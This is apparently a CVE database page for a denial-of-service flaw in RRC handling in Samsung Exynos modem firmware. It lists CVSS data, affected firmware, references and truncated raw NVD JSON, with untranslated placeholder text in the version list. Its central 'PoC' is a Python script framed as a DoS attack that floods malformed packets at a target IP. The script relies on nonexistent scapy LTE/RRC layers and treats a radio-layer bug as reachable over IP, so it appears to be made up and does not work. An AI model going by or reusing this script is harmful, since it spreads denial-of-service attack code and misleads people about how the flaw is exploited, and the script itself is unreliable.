CVE-2025-43706

Description

An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2400, 1580, 9110, W920, W930, Modem 5123, and Modem 5400. Incorrect handling of RRC packets leads to a Denial of Service.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1580_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1580:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_9110_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_9110:-:*:*:*:*:*:*:* - NOT VULNERABLE

Samsung Exynos 980 < 修复版本

Samsung Exynos 990 < 修复版本

Samsung Exynos 850 < 修复版本

Samsung Exynos 1080 < 修复版本

Samsung Exynos 2400 < 修复版本

Samsung Exynos 1580 < 修复版本

Samsung Exynos 9110 < 修复版本

Samsung Exynos W920 < 修复版本

Samsung Exynos W930 < 修复版本

Samsung Modem 5123 < 修复版本

Samsung Modem 5400 < 修复版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-43706 PoC - Malformed RRC Packet DoS
# This PoC demonstrates sending a malformed RRC message to trigger the vulnerability

from scapy.all import *
from scapy.layers.lte import *

def create_malformed_rrc_packet():
    """
    Create a malformed RRC packet to trigger L2 layer handling issue
    """
    # Create LTE RRC message with oversized or malformed fields
    rrc_packet = LTE() / RRC()
    rrc_packet.rrc_message_type = 0x01  # RRC Connection Request or similar
    
    # Add malformed fields that may trigger L2 processing bug
    # This is a conceptual PoC - actual packet structure depends on target
    malformed_data = b'\x00' * 1000  # Oversized data to trigger buffer handling
    
    # Construct packet with extended header to bypass validation
    packet = LTE() / Raw(load=malformed_data)
    
    return packet

def send_dos_packet(target_ip, duration=60):
    """
    Send malformed RRC packets to target device
    """
    print(f"[*] Starting DoS attack on {target_ip}")
    print(f"[*] Sending malformed RRC packets for {duration} seconds")
    
    start_time = time.time()
    packet_count = 0
    
    while time.time() - start_time < duration:
        try:
            # Create and send malformed packet
            pkt = create_malformed_rrc_packet()
            send(pkt, verbose=0)
            packet_count += 1
            
            if packet_count % 100 == 0:
                print(f"[+] Sent {packet_count} packets")
                
        except Exception as e:
            print(f"[-] Error: {e}")
            
    print(f"[*] Attack completed. Total packets sent: {packet_count}")

if __name__ == "__main__":
    # Target configuration
    target = "192.168.1.100"  # Replace with actual target
    
    # Execute DoS attack
    send_dos_packet(target, duration=60)
    print("[*] PoC execution completed")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43706
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43706
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43706/
[4] VulDB https://vuldb.com/cve/CVE-2025-43706
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-43706/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43706", "sourceIdentifier": "[email protected]", "published": "2026-01-05T19:15:56.060", "lastModified": "2026-01-09T14:14:35.807", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in L2 in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2400, 1580, 9110, W920, W930, Modem 5123, and Modem 5400. Incorrect handling of RRC packets leads to a Denial of Service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1080_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "43DE4D6F-D662-46F2-93BC-9AE950320BDE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1080:-:*:*:*:*:*:*:*", "matchCriteriaId": "EE06CD56-8BFD-4208-843A-179E3E6F5C10"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1580_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3594664-3CE6-4827-ABD4-B5719817F5D5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1580:-:*:*:*:*:*:*:*", "matchCriteriaId": "93C1F9E8-DA04-4466-AF66-01560A07BD98"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_980_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "5F18F62E-2012-442E-BE60-6E76325D1824"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_980:-:*:*:*:*:*:*:*", "matchCriteriaId": "0D8701B6-6989-44D1-873A-A1823BFD7CCC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_990_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BCF6C91D-DECE-4630-85FE-C22EF2B9160A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_990:-:*:*:*:*:*:*:*", "matchCriteriaId": "87FE8214-E165-4874-BB5A-3C4298708039"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_9110_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F1896BFF-D709-481B-AD4F-37D1A8B30C06"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_9110:-:*:*:*:*:*:*:*", "matchCriteriaId": "E6748EF2-3C63-41CD-B3D1-4B3FEC614B40"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_850_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "1928760C-4FC4-45B0-84FF-C1105CD1DD2A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_850:-:*:*:*:*:*:*:*", "matchCriteriaId": "BB410A6D-642B-49AE-8B1C-EADA953A84DA"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2400_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "16D9272E-1794-48FF-B6A4-8F48395BA38E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2400:-:*:*:*:*:*:*:*", "matchCriteriaId": "932F5FB3-5527-44D7-9DD9-EF03963E3CA3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_w930_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "801E188F-C71B-4933-9099-151A4A1B1BC5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_w930:-:*:*:*:*:*:*:*", "matchCriteriaId": "8D8FC82D-57C5-4F00-BDF4-4261A32C4246"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_w920_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "B6ADED27-EDAF-4FB3-8CB2-AE5F59B93641"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_w920:-:*:*:*:*:*:*:*", "matchCriteriaId": "4BF79654-E5C6-4DFF-B33A-A78571CD300C"}]}]}, ... (truncated)